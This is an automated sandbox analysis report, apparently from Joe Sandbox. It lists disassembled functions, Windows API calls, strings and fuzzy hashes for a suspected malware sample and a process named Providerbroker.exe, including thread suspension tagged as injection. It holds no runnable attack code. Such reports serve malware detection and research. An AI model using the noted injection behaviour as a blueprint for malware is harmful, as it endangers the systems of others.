Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: Process$CurrentFeaturePresentProcessorTerminate_free
String ID: *?$.
API String ID: 2667617558-3972193922
Opcode ID: 24177f1303fc0c2b907af2c7b7eb43e02322faf7c38b9a999d5b9cde15d1856f
Instruction ID: 404f55a7778ee7622342f99f5da2bd885d2ed220bac62a7c44004ab7a9eb5aa1
Opcode Fuzzy Hash: 24177f1303fc0c2b907af2c7b7eb43e02322faf7c38b9a999d5b9cde15d1856f
Instruction Fuzzy Hash: ED519471E0022A9FDF15DFA8C880AEDBBF5FF59314F2481A9D894E7341E6359A05CB50

Function 010075DE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137timeCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 010075E3

Part of subcall function 010105DA: _wcslen.LIBCMT ref: 010105E0

Part of subcall function 0100A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0100A598

SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 0100777F

Part of subcall function 0100A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0100A325,?,?,?,0100A175,?,00000001,00000000,?,?), ref: 0100A501
Part of subcall function 0100A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0100A325,?,?,?,0100A175,?,00000001,00000000,?,?), ref: 0100A532

Strings

:, xrefs: 01007654

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: File$Attributes$CloseFindH_prologTime_wcslen
String ID: :
API String ID: 3226429890-336475711
Opcode ID: 4fea321dbf4fb7375c9c09ef5a9cec7d3b33f215167b03e3376380eb442f8ee7
Instruction ID: b11a4c151c29fc10881f168db68412f4009bbab564832e87430acea193625797
Opcode Fuzzy Hash: 4fea321dbf4fb7375c9c09ef5a9cec7d3b33f215167b03e3376380eb442f8ee7
Instruction Fuzzy Hash: 74417171900259A9FB36EB64CC58EEEB77CAF55300F0040D6A6CAA70D2DB785B85CB71

Function 0101B48E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0101B4E3
_wcslen.LIBCMT ref: 0101B4FE

Strings

}, xrefs: 0101B4D6

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: _wcslen
String ID: }
API String ID: 176396367-4239843852
Opcode ID: 936d77c377cc58b1bea087efe988a2fe98ba6f7a71d594fa6bd6df2701d6a35c
Instruction ID: 528b68e383d7d2e985ceb3394e070aaf384fcab9c4249081fc2a5a519314684d
Opcode Fuzzy Hash: 936d77c377cc58b1bea087efe988a2fe98ba6f7a71d594fa6bd6df2701d6a35c
Instruction Fuzzy Hash: 3221C67290431A5ADB32DB68D844FABB3FCEF95750F04046AE6C0C7145EB6DD94883A2

Function 0100F344 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 0100F2C5: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0100F2E4
Part of subcall function 0100F2C5: GetProcAddress.KERNEL32(010481C8,CryptUnprotectMemory), ref: 0100F2F4

GetCurrentProcessId.KERNEL32(?,?,?,0100F33E), ref: 0100F3D2

Strings

CryptProtectMemory failed, xrefs: 0100F389
CryptUnprotectMemory failed, xrefs: 0100F3CA

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: AddressProc$CurrentProcess
String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
API String ID: 2190909847-396321323
Opcode ID: 009ee6bf3ed401f1bfecaae41a644a3f8b752ee455c99ac1d05672a3976549e1
Instruction ID: 88968022f55c8b13e60e87dd97a202f24e5968efcf44f9cbcf7f2f7151350bc2
Opcode Fuzzy Hash: 009ee6bf3ed401f1bfecaae41a644a3f8b752ee455c99ac1d05672a3976549e1
Instruction Fuzzy Hash: C5110631A0062B6BFB33AB24D881A6E3B98FF00670F04C157FCC15F2D5DA75A9419791

Function 0100B991 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 0100B9B8

Part of subcall function 01004092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 010040A5

Strings

%c:\, xrefs: 0100B9AE

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: __vswprintf_c_l_swprintf
String ID: %c:\
API String ID: 1543624204-3142399695
Opcode ID: 72ce45eff15f3600f4345f462fee55527617bec1800ae13176782f19b889a33e
Instruction ID: db617449798f4af6a5e0494c7b9b00353db38c05a3b0950266c7a506ce3bb9a3
Opcode Fuzzy Hash: 72ce45eff15f3600f4345f462fee55527617bec1800ae13176782f19b889a33e
Instruction Fuzzy Hash: 9201F56750032379FA72AB7D8C84DABB7ECEE96670F40491BF5C4D60C1EA34D48482B1

Function 0101101F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00010000,01011160,?,00000000,00000000), ref: 01011043
SetThreadPriority.KERNEL32(?,00000000), ref: 0101108A

Part of subcall function 01006C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 01006C54

Strings

CreateThread failed, xrefs: 0101104F

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: Thread$CreatePriority__vswprintf_c_l
String ID: CreateThread failed
API String ID: 2655393344-3849766595
Opcode ID: ae85d343ab2057327c7bbb679deabad2b66b98f40ec746ea108c98583d145588
Instruction ID: 206cfdbbd0883072cb6439eb0a098a7f4a1882cda37c427025e3a8e6eed6be5e
Opcode Fuzzy Hash: ae85d343ab2057327c7bbb679deabad2b66b98f40ec746ea108c98583d145588
Instruction Fuzzy Hash: 3201A7F574430A6BE2355E749C91BB6B399EB40651F10002EF6C65A285CAF668848624

Function 0102BB4E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 010297E5: GetLastError.KERNEL32(?,01041030,01024674,01041030,?,?,01023F73,00000050,?,01041030,00000200), ref: 010297E9
Part of subcall function 010297E5: _free.LIBCMT ref: 0102981C
Part of subcall function 010297E5: SetLastError.KERNEL32(00000000,?,01041030,00000200), ref: 0102985D
Part of subcall function 010297E5: _abort.LIBCMT ref: 01029863

_abort.LIBCMT ref: 0102BB80
_free.LIBCMT ref: 0102BBB4

Strings

x)J, xrefs: 0102BBBA, 0102BBC2

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: ErrorLast_abort_free
String ID: x)J
API String ID: 289325740-2012010399
Opcode ID: a1ffc755ec38a38d90acaee10b4a5eb1751f0588ec0b64fc87f4ca55490b4073
Instruction ID: cfdb3ef9816b3d5181e17b4b8306903cbca188b95f90eeb1d4ca22e410b9bfa2
Opcode Fuzzy Hash: a1ffc755ec38a38d90acaee10b4a5eb1751f0588ec0b64fc87f4ca55490b4073
Instruction Fuzzy Hash: BE01D635D00637DBCB72AF6CC40025DBBE5BF14721B15028AE9E467249CBB96901CFC0

Function 01001316 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

Part of subcall function 0100E2E8: _swprintf.LIBCMT ref: 0100E30E
Part of subcall function 0100E2E8: _strlen.LIBCMT ref: 0100E32F
Part of subcall function 0100E2E8: SetDlgItemTextW.USER32(?,0103E274,?), ref: 0100E38F
Part of subcall function 0100E2E8: GetWindowRect.USER32(?,?), ref: 0100E3C9
Part of subcall function 0100E2E8: GetClientRect.USER32(?,?), ref: 0100E3D5

GetDlgItem.USER32(00000000,00003021), ref: 0100135A
SetWindowTextW.USER32(00000000,010335F4), ref: 01001370

Strings

0, xrefs: 01001319

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: ItemRectTextWindow$Client_strlen_swprintf
String ID: 0
API String ID: 2622349952-4108050209
Opcode ID: f6b751423ced894b052c88f3860024e1f709eb490e2cb8d31f6b4898ef387fa9
Instruction ID: 65b811ef1a5752bd3bbe4d2a0fe35db3247a4442338e297b6d4ecb649b1af4a4
Opcode Fuzzy Hash: f6b751423ced894b052c88f3860024e1f709eb490e2cb8d31f6b4898ef387fa9
Instruction Fuzzy Hash: 75F03C7010438CABFF671F64C80DAEA3FA9AB44355F048554FDC8595E1CB79C5909B50

Function 01010FE4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF,01011206,?), ref: 01010FEA
GetLastError.KERNEL32(?), ref: 01010FF6

Part of subcall function 01006C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 01006C54

Strings

WaitForMultipleObjects error %d, GetLastError %d, xrefs: 01010FFF

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: ErrorLastObjectSingleWait__vswprintf_c_l
String ID: WaitForMultipleObjects error %d, GetLastError %d
API String ID: 1091760877-2248577382
Opcode ID: babe8eb073632b6e2df6a7a181251be46afc9b4c3b0fbdfb0cc57c3bd37f96cb
Instruction ID: 51e0d02caec95f89a0b6c173f2cde64c3ea88b909fc38d0b2ed7971a485457a1
Opcode Fuzzy Hash: babe8eb073632b6e2df6a7a181251be46afc9b4c3b0fbdfb0cc57c3bd37f96cb
Instruction Fuzzy Hash: ECD02B71A0453537D52232349C44DBE7809DB21331F104B04F1B8592D9CA6A49514791

Function 0100E29E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,0100DA55,?), ref: 0100E2A3
FindResourceW.KERNEL32(00000000,RTL,00000005,?,0100DA55,?), ref: 0100E2B1

Strings

RTL, xrefs: 0100E2AB

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: FindHandleModuleResource
String ID: RTL
API String ID: 3537982541-834975271
Opcode ID: 371d609f941b6b2d0f755d35130536fca736c8c4e843f2711f909dc00b00acdb
Instruction ID: 2d604e4db904fe36c96a5bc6f3f98bf81548d637e8a196ca89d90fe7ac456572
Opcode Fuzzy Hash: 371d609f941b6b2d0f755d35130536fca736c8c4e843f2711f909dc00b00acdb
Instruction Fuzzy Hash: 3FC0123164071066F63016656D9DB43AE5C6B00B11F05044CB2C1ED1C5D6AAC48187A0

Function 0102BEE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 6COMMON

Download Yara Rule

APIs

GetCommandLineA.KERNEL32 ref: 0102BEE0
GetCommandLineW.KERNEL32 ref: 0102BEEB

Strings

%I, xrefs: 0102BEE6

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: CommandLine
String ID: %I
API String ID: 3253501508-63094095
Opcode ID: 48509eac9cebe4f7a09c14e2cd7a38ee07d5092bba7341b260f7e4a9d1a53ca3
Instruction ID: 87d7aa7411e08cb66201adef50c758904af4f14991487440fff62a40c918fe77
Opcode Fuzzy Hash: 48509eac9cebe4f7a09c14e2cd7a38ee07d5092bba7341b260f7e4a9d1a53ca3
Instruction Fuzzy Hash: 46B092B89012088FD7208F30B08C0047BB4BE4D3023805856E882CA328DB3F4489DF00

Analysis Process: Providerbroker.exePID: 6204, Parent PID: 3572COMMON

Execution Graph

Execution Coverage:	5.5%
Dynamic/Decrypted Code Coverage:	75%
Signature Coverage:	0%
Total number of Nodes:	12
Total number of Limit Nodes:	0

Executed Functions

Function 00007FF849592B7A Relevance: .7, Instructions: 737
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000005.00000002.2251466892.00007FF849590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff849590000_Providerbroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 38356ca133089c09047060fe26eb67ac46e2036a71cc0d4e994c427f8ca12e94
Instruction ID: a116971c9e649fa06d7879743143acbf32b35654c2cf3c158781aeaba58c55ec
Opcode Fuzzy Hash: 38356ca133089c09047060fe26eb67ac46e2036a71cc0d4e994c427f8ca12e94
Instruction Fuzzy Hash: DD52B23091C6898FEB6DDF18D8D46B877B1FF49344F2441BDD46ACB296CA38A981CB41

Function 00007FF848E90D68 Relevance: .3, Instructions: 276COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2241317098.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848e90000_Providerbroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dfc55ad788c78ecc64206c5fbce717385831c17e77cf4cd620d76ee8cd22db76
Instruction ID: 43fe367cde3b416eef9c8c969b97a3c023fe32eae524de0aa0bc7cf35c2f689f
Opcode Fuzzy Hash: dfc55ad788c78ecc64206c5fbce717385831c17e77cf4cd620d76ee8cd22db76
Instruction Fuzzy Hash: 67A1CF7191CA899FE788EB6CC8653A9BFF1FB56350F4401BAC009D72D2CB791825CB51

Function 00007FF8495A0A3E Relevance: 3.0, Strings: 2, Instructions: 545
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

`6nI, xrefs: 00007FF8495A9A1D
8^ZI, xrefs: 00007FF8495A9A37

Memory Dump Source

Source File: 00000005.00000002.2251466892.00007FF849590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff849590000_Providerbroker.jbxd

Similarity

API ID:
String ID: 8^ZI$`6nI
API String ID: 0-1195450933
Opcode ID: 13d290b8e1d0a2f092874d3b2cc03efb6a405a89ce49c52802aa78cb65238aa5
Instruction ID: c829829b72d64b685c78e759a54b8545b70ffcc69317745c04f1eecbbdfdd846
Opcode Fuzzy Hash: 13d290b8e1d0a2f092874d3b2cc03efb6a405a89ce49c52802aa78cb65238aa5
Instruction Fuzzy Hash: 4FF10872C4FBE66FE229BF78E8650F57F90EF022A8B1C41B7D0884E093DD1968458659

Function 00007FF84959C784 Relevance: 2.8, Strings: 2, Instructions: 307
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

\^H, xrefs: 00007FF84959C7D1
PcI, xrefs: 00007FF84959CB59

Memory Dump Source

Source File: 00000005.00000002.2251466892.00007FF849590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff849590000_Providerbroker.jbxd

Similarity

API ID:
String ID: PcI$\^H
API String ID: 0-2189569119
Opcode ID: 7f9f753078dde4f2bc226cd117d07b53f118a95266280b6eb579f84a9682dfce
Instruction ID: 00409650ec9bbef7c58f5110047297659e661e6bd89b6b8eb877eed4e61c844d
Opcode Fuzzy Hash: 7f9f753078dde4f2bc226cd117d07b53f118a95266280b6eb579f84a9682dfce
Instruction Fuzzy Hash: AEA1B171A0DACA8FE7A5EF28C8546B87BF2FF45344F5941FAD01DC7192DE2898058741

Function 00007FF8490408BB Relevance: 1.7, APIs: 1, Instructions: 172
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileAttributesW.KERNEL32 ref: 00007FF8490409E2

Memory Dump Source

Source File: 00000005.00000002.2243679796.00007FF849030000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff849030000_Providerbroker.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 318e2c30d055aec3e04a8c675b37b4d1af7f72f39acd1626d209eb71015fb7db
Instruction ID: 44362dec394179bdd8e5b60a2b17163bbfd42297e3043c1192b1c342f489bd0a
Opcode Fuzzy Hash: 318e2c30d055aec3e04a8c675b37b4d1af7f72f39acd1626d209eb71015fb7db
Instruction Fuzzy Hash: 58512C70908A4C8FDF98EF58C899AEDBBF0FB69311F14416ED409E7252DB31A885CB41

Function 00007FF84903CEC0 Relevance: 1.7, APIs: 1, Instructions: 171
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileAttributesW.KERNEL32 ref: 00007FF8490409E2

Memory Dump Source

Source File: 00000005.00000002.2243679796.00007FF849030000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff849030000_Providerbroker.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 8b868bcc4fc372e15f464e3510a2d06fdbc85b08a89e579f048275c9eb9d648e
Instruction ID: 61c3d0c2d2ff0d1629e4209cc8195790d0d9767dbee0042bfcc9c4c0b78b32c8
Opcode Fuzzy Hash: 8b868bcc4fc372e15f464e3510a2d06fdbc85b08a89e579f048275c9eb9d648e
Instruction Fuzzy Hash: BF511870908A4C8FDF98EF58D899AEDBBF0FB69311F10416AD409E7251DB31A885CB41

Function 00007FF849040871 Relevance: 1.7, APIs: 1, Instructions: 169
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000005.00000002.2243679796.00007FF849030000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff849030000_Providerbroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5cc095b573654bf92dcf216d61e69a00a06a452f4277a72bce3c10304164b906
Instruction ID: fafe36dea99cfe34333eb6f90e09e59dcb84f14ea5b35250f82ac10d4bd3194a
Opcode Fuzzy Hash: 5cc095b573654bf92dcf216d61e69a00a06a452f4277a72bce3c10304164b906
Instruction Fuzzy Hash: 67513C71908A4C8FDF98EF58D894AEDBBB0FF69310F14416ED049E7252DB35A845CB41

Function 00007FF84903EA60 Relevance: 1.7, APIs: 1, Instructions: 161
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ResumeThread.KERNEL32 ref: 00007FF84903EB61

Memory Dump Source

Source File: 00000005.00000002.2243679796.00007FF849030000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff849030000_Providerbroker.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 63e12a4e83e6bec085db4e7101c0b2a288a8c654aa1e7fa9bc3e0817205fc238
Instruction ID: e93e9449276366416f57eb0da9f33586a965c42854ed173f9c06f3788358fbbc
Opcode Fuzzy Hash: 63e12a4e83e6bec085db4e7101c0b2a288a8c654aa1e7fa9bc3e0817205fc238
Instruction Fuzzy Hash: DA517C7090D78C8FDB56DFA8C854AE9BFF0EF56310F0441ABD049D7292DA75A846CB11

Function 00007FF84903D1FD Relevance: 1.6, APIs: 1, Instructions: 138
threadinjectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SuspendThread.KERNEL32 ref: 00007FF84903D2D1

Memory Dump Source

Source File: 00000005.00000002.2243679796.00007FF849030000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff849030000_Providerbroker.jbxd

Similarity

API ID: SuspendThread
String ID:
API String ID: 3178671153-0
Opcode ID: 761464269168f31388aae6a1516af96936072ce65c0da02bd3d1c4a578d5b2c1
Instruction ID: 4706783256438afd21c7c1f04bed14b9c0620eda1368350f401b6431cc92e6b5
Opcode Fuzzy Hash: 761464269168f31388aae6a1516af96936072ce65c0da02bd3d1c4a578d5b2c1
Instruction Fuzzy Hash: 89412B70D0864C8FDB99DFA8D885AADBBB0FB5A310F14416AD049E7252DA74A845CB41

Function 00007FF84959064B Relevance: 1.5, Strings: 1, Instructions: 224
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

X;WI, xrefs: 00007FF84959068E

Memory Dump Source

Source File: 00000005.00000002.2251466892.00007FF849590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff849590000_Providerbroker.jbxd

Similarity

API ID:
String ID: X;WI
API String ID: 0-4248420487
Opcode ID: 6ba6b644ccab60358e0713d3d81313dd73b518be84380a2ae5ac802b19b6e1e0
Instruction ID: 2863b25f49f7030386bcd4631ec6d756488815c3ce77d5f349bf9631a936d4e7
Opcode Fuzzy Hash: 6ba6b644ccab60358e0713d3d81313dd73b518be84380a2ae5ac802b19b6e1e0
Instruction Fuzzy Hash: BF71E230D1D68A9FFB65EF788C546BD7BA0EF55384F2508BAD01EC7182DE286841CB51

Function 00007FF84959EA18 Relevance: 1.4, Strings: 1, Instructions: 160
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

, xrefs: 00007FF84959EA92

Memory Dump Source

Source File: 00000005.00000002.2251466892.00007FF849590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff849590000_Providerbroker.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 9f892a38942d3355df35869a7ced8d110297693cf6d73c749f68dbb1fb50fd3f
Instruction ID: 8345ccea1c9fd74989e237ff44621469635cabdf99d14ce78d8a7a3156183075
Opcode Fuzzy Hash: 9f892a38942d3355df35869a7ced8d110297693cf6d73c749f68dbb1fb50fd3f
